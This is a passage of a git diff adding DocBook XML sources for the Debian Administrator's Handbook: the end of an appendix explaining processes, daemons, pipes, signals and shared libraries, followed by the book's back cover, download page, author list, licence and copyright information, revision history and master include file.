+      be prepared on a disk before it can be mounted and this operation is
+      known as “formatting”. Commands such as
+      <command>mkfs.ext3</command> (where <command>mkfs</command> stands
+      for <emphasis>MaKe FileSystem</emphasis>) handle formatting. These
+      commands require, as a parameter, a device file representing the
+      partition to be formatted (for instance,
+      <filename>/dev/sda1</filename>). This operation is destructive and
+      should only be run once, except if one deliberately wishes to wipe a
+      filesystem and start afresh.</para>
+
+      <para>There are also network filesystems, such as
+      <acronym>NFS</acronym>, where data is not stored on a local disk.
+      Instead, data is transmitted through the network to a server that
+      stores and retrieves them on demand. The filesystem abstraction
+      shields users from having to care: files remain accessible in their
+      usual hierarchical way.</para>
+    </section>
+    <section id="sect.shared-functions">
+      <title>Shared Functions</title>
+
+      <para>Since a number of the same functions are used by all software,
+      it makes sense to centralize them in the kernel. For instance, shared
+      filesystem handling allows any application to simply open a file by
+      name, without needing to worry where the file is stored physically.
+      The file can be stored in several different slices on a hard disk, or
+      split across several hard disks, or even stored on a remote file
+      server. Shared communication functions are used by applications to
+      exchange data independently of the way the data is transported. For
+      instance, transport could be over any combination of local or
+      wireless networks, or over a telephone landline.</para>
+    </section>
+    <section id="sect.process-management">
+      <title>Managing Processes</title>
+      <indexterm><primary><emphasis>pid</emphasis></primary></indexterm>
+
+      <para>A process is a running instance of a program. This
+      requires memory to store both the program itself and its
+      operating data. The kernel is in charge of creating and tracking
+      them. When a program runs, the kernel first sets aside some
+      memory, then loads the executable code from the filesystem into
+      it, and then starts the code running.  It keeps information
+      about this process, the most visible of which is an
+      identification number known as <emphasis>pid</emphasis>
+      (<emphasis>process identifier</emphasis>).</para>
+
+      <para>Unix-like kernels (including Linux), like most other modern
+      operating systems, are capable of “multi-tasking”. In other words,
+      they allow running many processes “at the same time”. There is
+      actually only one running process at any one time, but the kernel
+      cuts time into small slices and runs each process in turn. Since
+      these time slices are very short (in the millisecond range), they
+      create the illusion of processes running in parallel, although
+      they are actually only active during some time intervals and idle the
+      rest of the time. The kernel's job is to adjust its scheduling
+      mechanisms to keep that illusion, while maximizing the global system
+      performance. If the time slices are too long, the application may
+      not appear as responsive as desired. Too short, and the system
+      loses time switching tasks too frequently. These decisions can be
+      tweaked with process priorities. High-priority processes will run for
+      longer and with more frequent time slices than low-priority
+      processes.</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Multi-processor systems (and variants)</title>
+
+	<para>The limitation described above of only one process being
+	able to run at a time, doesn't always apply. The actual
+	restriction is that there can only be one
+	running process <emphasis>per processor core</emphasis> at a
+	time. Multi-processor, multi-core or “hyper-threaded” systems
+	allow several processes to run in parallel. The same
+	time-slicing system is still used, though, so as to handle
+	cases where there are more active processes than available
+	processor cores. This is far from unusual: a basic system,
+	even a mostly idle one, almost always has tens of running
+	processes.</para>
+      </sidebar>
+
+      <para>Of course, the kernel allows running several independent
+      instances of the same program. But each can only access its own time
+      slices and memory. Their data thus remain independent.</para>
+    </section>
+    <section id="sect.permissions">
+      <title>Rights Management</title>
+
+      <para>Unix-like systems are also multi-user. They provide a
+      rights management system that supports separate users and groups;
+      it also allows control over actions based on
+      permissions. The kernel manages data for each process, allowing
+      it to control permissions. Most of the time, a process is identified
+      by the user who started it. That process is only permitted
+      to take those actions available to its owner. For instance, trying
+      to open a file requires the kernel
+      to check the process identity against access permissions (for
+      more details on this particular example, see <xref linkend="sect.rights-management" />).</para>
+    </section>
+  </section>
+  <section id="sect.user-space">
+    <title>The User Space</title>
+    <indexterm><primary>user space</primary></indexterm>
+    <indexterm><primary>kernel space</primary></indexterm>
+
+    <para>“User space” refers to the runtime environment of normal (as
+    opposed to kernel) processes. This does not necessarily mean these
+    processes are actually started by users because a standard system
+    normally has several “daemon” (or background) processes running before the user
+    even opens a session. Daemon processes are also considered user-space processes.</para>
+    <section id="sect.process-basics">
+      <title>Process</title>
+      <indexterm><primary><command>init</command></primary></indexterm>
+
+      <para>When the kernel gets past its initialization phase, it starts
+      the very first process, <command>init</command>. Process #1 alone is
+      very rarely useful by itself, and Unix-like systems run with many
+      additional processes.</para>
+      <indexterm><primary><emphasis>fork</emphasis></primary></indexterm>
+
+      <para>First of all, a process can clone itself (this is known as a
+      <emphasis>fork</emphasis>). The kernel allocates a new (but
+      identical) process memory space, and another process to use it. At
+      this time, the only difference between these two processes
+      is their <emphasis>pid</emphasis>. The new process is usually
+      called a child process, and the original process whose
+      <emphasis>pid</emphasis> doesn't change, is called the parent
+      process.</para>
+
+      <para>Sometimes, the child process continues to lead its own
+      life independently from its parent, with its own data copied
+      from the parent process. In many cases, though, this child
+      process executes another program. With a few exceptions, its
+      memory is simply replaced by that of the new program, and
+      execution of this new program begins. This is the mechanism
+      used by the init process (with process number 1) to start
+      additional services and execute the whole startup sequence.
+      At some point, one process among <command>init</command>'s offspring
+      starts a graphical interface for users to log in to (the actual
+      sequence of events is described in more details in
+      <xref linkend="sect.system-boot" />).</para>
+
+      <para>When a process finishes the task for which it was started, it
+      terminates. The kernel then recovers the memory assigned to this
+      process, and stops giving it slices of running time. The parent
+      process is told about its child process being terminated, which
+      allows a process to wait for the completion of a task it delegated to
+      a child process. This behavior is plainly visible in command-line
+      interpreters (known as <emphasis>shells</emphasis>). When a command
+      is typed into a shell, the prompt only comes back when the execution
+      of the command is over. Most shells allow for running the command in
+      the background, it is a simple matter of adding an
+      <userinput>&amp;</userinput> to the end of the command. The prompt is
+      displayed again right away, which can lead to problems if the command
+      needs to display data of its own.</para>
+    </section>
+    <section id="sect.daemons">
+      <title>Daemons</title>
+      <indexterm><primary>daemon</primary></indexterm>
+      <indexterm><primary>daemon</primary></indexterm>
+
+      <para>A “daemon” is a process started automatically by the boot
+      sequence. It keeps running (in the background) to perform maintenance
+      tasks or provide services to other processes. This “background
+      task” is actually arbitrary, and does not match anything particular
+      from the system's point of view. They are simply processes, quite
+      similar to other processes, which run in turn when their time slice
+      comes. The distinction is only in the human language: a process that
+      runs with no interaction with a user (in particular, without any
+      graphical interface) is said to be running “in the background” or
+      “as a daemon”.</para>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> Daemon, demon, a derogatory term?</title>
+
+	<para>Although <emphasis>daemon</emphasis> term shares its
+	Greek etymology with <emphasis>demon</emphasis>, the former
+	does not imply diabolical evil, instead, it should be
+	understood as a kind of helper spirit. This distinction is
+	subtle enough in English; it is even worse in other languages
+	where the same word is used for both meanings.</para>
+      </sidebar>
+
+      <para>Several such daemons are described in detail in <xref linkend="unix-services" />.</para>
+    </section>
+    <section id="sect.ipc">
+      <title>Inter-Process Communications</title>
+      <indexterm><primary>IPC</primary></indexterm>
+      <indexterm><primary>Inter-Process Communications</primary></indexterm>
+
+      <para>An isolated process, whether a daemon or an interactive
+      application, is rarely useful on its own, which is why there are
+      several methods allowing separate processes to communicate together,
+      either to exchange data or to control one another. The generic term
+      referring to this is <emphasis>inter-process
+      communication</emphasis>, or IPC for short.</para>
+
+      <para>The simplest IPC system is to use files. The process that
+      wishes to send data writes it into a file (with a name known in
+      advance), while the recipient only has to open the file and read its
+      contents.</para>
+      <indexterm><primary><emphasis>pipe</emphasis></primary></indexterm>
+
+      <para>In the case where you do not wish to store data on disk, you
+      can use a <emphasis>pipe</emphasis>, which is simply an object with
+      two ends; bytes written in one end are readable at the other. If the
+      ends are controlled by separate processes, this leads to a simple and
+      convenient inter-process communication channel. Pipes can be
+      classified into two categories: named pipes, and anonymous pipes. A
+      named pipe is represented by an entry on the filesystem (although the
+      transmitted data is not stored there), so both processes can open it
+      independently if the location of the named pipe is known beforehand.
+      In cases where the communicating processes are related (for instance,
+      a parent and its child process), the parent process can also create
+      an anonymous pipe before forking, and the child inherits it. Both
+      processes will then be able to exchange data through the pipe without
+      needing the filesystem.</para>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> A concrete example</title>
+
+	<para>Let's describe in some detail what happens when a complex
+	command (a <emphasis>pipeline</emphasis>) is run from a shell. We
+	assume we have a <command>bash</command> process (the standard user
+	shell on Debian), with <emphasis>pid</emphasis> 4374; into this
+	shell, we type the command: <command>ls | sort</command> .</para>
+
+	<para>The shell first interprets the command typed in. In our case,
+	it understands there are two programs (<command>ls</command> and
+	<command>sort</command>), with a data stream flowing from one to
+	the other (denoted by the <userinput>|</userinput> character, known
+	as <emphasis>pipe</emphasis>). <command>bash</command> first
+	creates an unnamed pipe (which initially exists only within the
+	<command>bash</command> process itself).</para>
+
+	<para>Then the shell clones itself; this leads to a new
+	<command>bash</command> process, with
+	<emphasis>pid</emphasis> #4521 (<emphasis>pids</emphasis> are
+	abstract numbers, and generally have no particular meaning).
+	Process #4521 inherits the pipe, which means it is able to write in
+	its “input” side; <command>bash</command> redirects its
+	standard output stream to this pipe's input. Then it executes (and
+	replaces itself with) the <command>ls</command> program, which
+	lists the contents of the current directory. Since
+	<command>ls</command> writes on its standard output, and this
+	output has previously been redirected, the results are effectively
+	sent into the pipe.</para>
+
+	<para>A similar operation happens for the second command:
+	<command>bash</command> clones itself again, leading to a new
+	<command>bash</command> process with pid #4522. Since it is also a
+	child process of #4374, it also inherits the pipe;
+	<command>bash</command> then connects its standard input to the
+	pipe output, then executes (and replaces itself with) the
+	<command>sort</command> command, which sorts its input and displays
+	the results.</para>
+
+	<para>All the pieces of the puzzle are now set up:
+	<command>ls</command> reads the current directory and writes
+	the list of files into the pipe; <command>sort</command> reads
+	this list, sorts it alphabetically, and displays the
+	results. Processes numbers #4521 and #4522 then terminate, and
+	#4374 (which was waiting for them during the operation),
+	resumes control and displays the prompt to allow the user to
+	type in a new command.</para>
+      </sidebar>
+
+      <para>Not all inter-process communications are used to move data
+      around, though. In many situations, the only information that needs to
+      be transmitted are control messages such as “pause execution” or
+      “resume execution”. Unix (and Linux) provides a mechanism known
+      as <emphasis>signals</emphasis>, through which a process can simply
+      send a specific signal (chosen from a predefined list of
+      signals) to another process. The only requirement is to know the
+      <emphasis>pid</emphasis> of the target.</para>
+
+      <para>For more complex communications, there are also mechanisms
+      allowing a process to open access, or share, part of its
+      allocated memory to other processes. Memory now shared between them
+      can be used to move data between the processes.</para>
+
+      <para>Finally, network connections can also help processes
+      communicate; these processes can even be running on different
+      computers, possibly thousands of kilometers apart.</para>
+
+      <para>It is quite standard for a typical Unix-like system to make use
+      of all these mechanisms to various degrees.</para>
+    </section>
+    <section id="sect.libraries">
+      <title>Libraries</title>
+      <indexterm><primary>library (of functions)</primary></indexterm>
+
+      <para>Function libraries play a crucial role in a Unix-like operating
+      system. They are not proper programs, since they cannot be executed
+      on their own, but collections of code fragments that can be used by
+      standard programs. Among the common libraries, you can find:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>the standard C library (<emphasis>glibc</emphasis>), which
+	  contains basic functions such as ones to open files or network
+	  connections, and others facilitating interactions with the
+	  kernel;</para>
+        </listitem>
+        <listitem>
+	  <para>graphical toolkits, such as Gtk+ and Qt, allowing many programs to
+	  reuse the graphical objects they provide;</para>
+        </listitem>
+        <listitem>
+	  <para>the <emphasis>libpng</emphasis> library, that allows
+	  loading, interpreting and saving images in the PNG format.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>Thanks to those libraries, applications can reuse existing
+      code. Application development is simplified since
+      many applications can reuse the same functions. With
+      libraries often developed by different persons, the global
+      development of the system is closer to Unix's historical
+      philosophy.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> The Unix Way: one thing at a time</title>
+
+	<para>One of the fundamental concepts that underlies the Unix
+	family of operating systems is that each tool should only do one
+	thing, and do it well; applications can then reuse these tools to
+	build more advanced logic on top. This philosophy can be seen in many
+	incarnations. Shell scripts may be the best example: they assemble
+	complex sequences of very simple tools (such as
+	<command>grep</command>, <command>wc</command>,
+	<command>sort</command>, <command>uniq</command> and so on).
+	Another implementation of this philosophy can be seen in code
+	libraries: the <emphasis>libpng</emphasis> library allows reading
+	and writing PNG images, with different options and in different
+	ways, but it does only that; no question of including functions
+	that display or edit images.</para>
+      </sidebar>
+
+      <para>Moreover, these libraries are often referred to as “shared
+      libraries”, since the kernel is able to only load them into memory
+      once, even if several processes use the same library at the same
+      time. This allows saving memory, when compared with the opposite
+      (hypothetical) situation where the code for a library would be loaded
+      as many times as there are processes using it.</para>
+    </section>
+  </section>
+</appendix>
diff --git a/tmp/cs-CZ/xml_tmp/99_backcover.xml b/tmp/cs-CZ/xml_tmp/99_backcover.xml
new file mode 100644
index 000000000..f0d2bb6d6
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/99_backcover.xml
@@ -0,0 +1,64 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix id="backcover">
+  <title>The Debian Administrator's Handbook</title>
+  <subtitle>Debian Jessie from Discovery to Mastery</subtitle>
+  
+  <para>
+    Debian GNU/Linux, a very popular non-commercial Linux
+    distribution, is known for its reliability and richness. Built and
+    maintained by an impressive network of thousands of developers
+    throughout the world, the Debian project is cemented by its social
+    contract. This foundation text defines the project's objective:
+    fulfilling the needs of users with a 100% free operating system. The
+    success of Debian and of its ecosystem of derivative distributions
+    (with Ubuntu at the forefront) means that an increasing number of
+    administrators are exposed to Debian's technologies.
+  </para>
+  <para>
+    This Debian Administrator's Handbook, which has been entirely updated
+    for Debian 8 “Jessie”, builds on the success of its 6
+    previous editions. Accessible to all, this book teaches the essentials
+    to anyone who wants to become an effective and independent Debian
+    GNU/Linux administrator. It covers all the topics that a competent
+    Linux administrator should master, from installation to updating the
+    system, creating packages and compiling the kernel, but also
+    monitoring, backup and migration, without forgetting advanced topics
+    such as setting up SELinux or AppArmor to secure services, automated
+    installations, or virtualization with Xen, KVM or LXC.
+  </para>
+  <para>
+    This book is not only designed for professional system administrators.
+    Anyone who uses Debian or Ubuntu on their own computer is de facto an
+    administrator and will find tremendous value in knowing more about how
+    their system works. Being able to understand and resolve problems will
+    save you invaluable time.
+  </para>
+  
+  <para>
+    <emphasis role="strong">Raphaël Hertzog</emphasis> is a computer
+    science engineer who graduated from the National Institute of Applied
+    Sciences (INSA) in Lyon, France, and has been a Debian developer since
+    1997. The founder of Freexian, the first French IT services company
+    specialized in Debian GNU/Linux, he is one of the most prominent
+    contributors to this Linux distribution.
+  </para>
+  <para>
+    <emphasis role="strong">Roland Mas</emphasis> is a
+    telecommunications engineer who graduated from the National
+    Superior School of Telecommunications (ENST) in Paris, France.  A
+    Debian developer since 2000 as well as the developer of the
+    FusionForge software, he works as a freelance consultant who
+    specializes in the installation and migration of Debian GNU/Linux
+    systems and in setting up collaborative work tools.
+  </para>
+  
+  <para>
+    This book has a story. It started its life as a French-language book
+    (Cahier de l'Admin Debian published by Eyrolles) and has been
+    translated into English thanks to hundreds of persons who contributed
+    to a fundraising. Learn more at https://debian-handbook.info, where you
+    can also obtain an electronic version of this book.
+  </para>
+</appendix>
diff --git a/tmp/cs-CZ/xml_tmp/99_website.xml b/tmp/cs-CZ/xml_tmp/99_website.xml
new file mode 100644
index 000000000..2784921e8
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/99_website.xml
@@ -0,0 +1,75 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix id="website">
+  <title>Get the book</title>
+  <para>
+    Before going further, if you want to make up your mind about the book,
+    you're invited to <ulink url="https://debian-handbook.info/browse/en-US/stable/">browse the
+      online version</ulink>.
+  </para>
+  <section id="sect.buy-the-paperback">
+    <title>Buy the English Paperback</title>
+    <para>
+       The paperback is available through Lulu's print-on-demand service
+       at a price of €44.90 (without VAT and shipping). <ulink url="">Click here to view
+         the book details on Lulu.com</ulink>. Click on the button below to buy it
+       directly.
+     </para>
+     
+  </section>
+  <section id="sect.download-the-electronic-version">
+    <title>Download the electronic version</title>
+    <para>
+      The e-book is available in 3 formats (PDF, EPUB, Mobipocket) and
+      multiple languages.
+    </para>
+    <para>
+      The book is freely available because we want everybody to benefit
+      from it. That said maintaining it for each new Debian release takes
+      time and lots of effort, and we appreciate being thanked for this.
+      If you find this book valuable, please consider contributing to its
+      continued maintenance either by buying a paperback copy or by making
+      a donation via the form below (after having completed your donation,
+      you will be automatically directed to the download page).
+    </para>
+    <para>
+      Pick your contribution:
+    </para>
+    
+    <para>
+      You can also directly download the book on <ulink url="https://debian-handbook.info/get/now/">this page</ulink>. In that case,
+      we hope that you will contribute to the book's success by spreading
+      the word around you. Of course, you can always come back later to
+      make a donation. 
+    </para>
+  </section>
+  <section id="sect.download-the-book">
+    <title>Download the book</title>
+    <para>
+      <emphasis>Thank you very much for your donation</emphasis>. We
+      really appreciate it. We hope that you will enjoy our book!
+    </para>
+    <para>
+      The book is available in 3 formats and multiple languages (see other
+      tabs for translations).
+    </para>
+    <para>
+      The PDF format is the document corresponding to the printed book.
+      It's not suitable for reading on small screens. The EPUB format is
+      the recommended format if your reading devices supports it (most
+      smartphones and many ebook readers do support it). The Mobipocket
+      format is mainly for ebook readers that do not support EPUB (like
+      the Kindle).
+    </para>
+    <para>
+      Click on the link of the version that you wish to download:
+    </para>
+    <itemizedlist>
+      <listitem><para>English PDF (30 Mb)</para></listitem>
+      <listitem><para>English EPUB (5 Mb)</para></listitem>
+      <listitem><para>English Mobipocket (13 Mb)</para></listitem>
+    </itemizedlist>
+  </section>
+
+</appendix>
diff --git a/tmp/cs-CZ/xml_tmp/Author_Group.xml b/tmp/cs-CZ/xml_tmp/Author_Group.xml
new file mode 100644
index 000000000..d793964c1
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/Author_Group.xml
@@ -0,0 +1,15 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE authorgroup PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<authorgroup>
+  <author>
+    <firstname>Raphaël</firstname>
+    <surname>Hertzog</surname>
+    <email>hertzog@debian.org</email>
+  </author>
+  <author>
+    <firstname>Roland</firstname>
+    <surname>Mas</surname>
+    <email>lolando@debian.org</email>
+  </author>
+</authorgroup>
diff --git a/tmp/cs-CZ/xml_tmp/Book_Info.xml b/tmp/cs-CZ/xml_tmp/Book_Info.xml
new file mode 100644
index 000000000..27c31e649
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/Book_Info.xml
@@ -0,0 +1,105 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE bookinfo PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<bookinfo id="book-tdah">
+  <title>The Debian Administrator's Handbook</title>
+  <subtitle>Debian Stretch from Discovery to Mastery</subtitle>
+  <productname>Debian</productname>
+  <productnumber>9</productnumber>
+  <edition>1</edition>
+  <pubsnumber>0</pubsnumber>
+  <publisher>
+   <publishername>Freexian SARL</publishername>
+   <address><city>Sorbiers</city></address>
+  </publisher>
+  <abstract>
+    <para>A reference book presenting the Debian distribution, from initial
+    installation to configuration of services.</para>
+  </abstract>
+  <legalnotice>
+    <para>ISBN: 979-10-91414-16-6 (English paperback)</para>
+
+    <para>ISBN: 979-10-91414-17-3 (English ebook)</para>
+
+    <para>This book is available under the terms of two licenses compatible
+    with the Debian Free Software Guidelines.</para>
+    <formalpara>
+      <title>Creative Commons License Notice:</title>
+
+      <para>This book is licensed under a Creative Commons
+      Attribution-ShareAlike 3.0 Unported License. <ulink type="block" url="http://creativecommons.org/licenses/by-sa/3.0/" /></para>
+    </formalpara>
+    <formalpara>
+      <title>GNU General Public License Notice:</title>
+
+      <para>This book is free documentation: you can redistribute it and/or
+      modify it under the terms of the GNU General Public License as
+      published by the Free Software Foundation, either version 2 of the
+      License, or (at your option) any later version.</para>
+    </formalpara>
+
+    <para>This book is distributed in the hope that it will be useful, but
+    WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+    General Public License for more details.</para>
+
+    <para>You should have received a copy of the GNU General Public License
+    along with this program. If not, see <ulink url="http://www.gnu.org/licenses/" />.</para>
+    <important>
+      <title>Show your appreciation</title>
+
+      <para>This book is published under a free license because we want
+      everybody to benefit from it. That said maintaining it takes time and
+      lots of effort, and we appreciate being thanked for this. If you
+      find this book valuable, please consider contributing to its
+      continued maintenance either by buying a paperback copy or by making
+      a donation through the book's official website: <ulink type="block" url="http://debian-handbook.info" /></para>
+    </important>
+  </legalnotice>
+  <xi:include href="Author_Group.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+  <copyright>
+    <year>2003</year>
+    <year>2004</year>
+    <year>2005</year>
+    <year>2006</year>
+    <year>2007</year>
+    <year>2008</year>
+    <year>2009</year>
+    <year>2010</year>
+    <year>2011</year>
+    <year>2012</year>
+    <year>2013</year>
+    <year>2014</year>
+    <year>2015</year>
+    <year>2016</year>
+    <year>2017</year>
+    <holder>Raphaël Hertzog</holder>
+  </copyright>
+  <copyright>
+    <year>2006</year>
+    <year>2007</year>
+    <year>2008</year>
+    <year>2009</year>
+    <year>2010</year>
+    <year>2011</year>
+    <year>2012</year>
+    <year>2013</year>
+    <year>2014</year>
+    <year>2015</year>
+    <holder>Roland Mas</holder>
+  </copyright>
+  <copyright>
+    <year>2012</year>
+    <year>2013</year>
+    <year>2014</year>
+    <year>2015</year>
+    <year>2016</year>
+    <year>2017</year>
+    <holder>Freexian SARL</holder>
+  </copyright>
+  <mediaobject role="cover">
+    <imageobject>
+      <imagedata fileref="images/cover.jpg" />
+    </imageobject>
+  </mediaobject>
+</bookinfo>
diff --git a/tmp/cs-CZ/xml_tmp/Revision_History.xml b/tmp/cs-CZ/xml_tmp/Revision_History.xml
new file mode 100644
index 000000000..36d4e61b7
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/Revision_History.xml
@@ -0,0 +1,19 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix>
+  <title>Revision History</title>
+  <simpara>
+    <revhistory>
+      <revision>
+        <revnumber>1.0-1</revnumber>
+        <date>2012-04-01</date>
+        <author>
+          <firstname>Raphaël</firstname>
+          <surname>Hertzog</surname>
+          <email>hertzog@debian.org</email>
+        </author>
+      </revision>
+    </revhistory>
+  </simpara>
+</appendix>
diff --git a/tmp/cs-CZ/xml_tmp/debian-handbook.xml b/tmp/cs-CZ/xml_tmp/debian-handbook.xml
new file mode 100644
index 000000000..a82714829
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/debian-handbook.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0"?>
+<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook V4.5//EN"
+  "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd">
+<book id="the-debian-administrators-handbook">
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="Book_Info.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="00a_preface.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="00b_foreword.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="01_the-debian-project.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="02_case-study.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="03_existing-setup.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="04_installation.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="05_packaging-system.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="06_apt.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="07_solving-problems.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="08_basic-configuration.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="09_unix-services.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="10_network-infrastructure.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="11_network-services.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="12_advanced-administration.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="13_workstation.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="14_security.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="15_debian-packaging.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="70_conclusion.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="90_derivative-distributions.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="92_short-remedial-course.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="99_backcover.xml"/>
+  <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="99_website.xml"/>
+</book>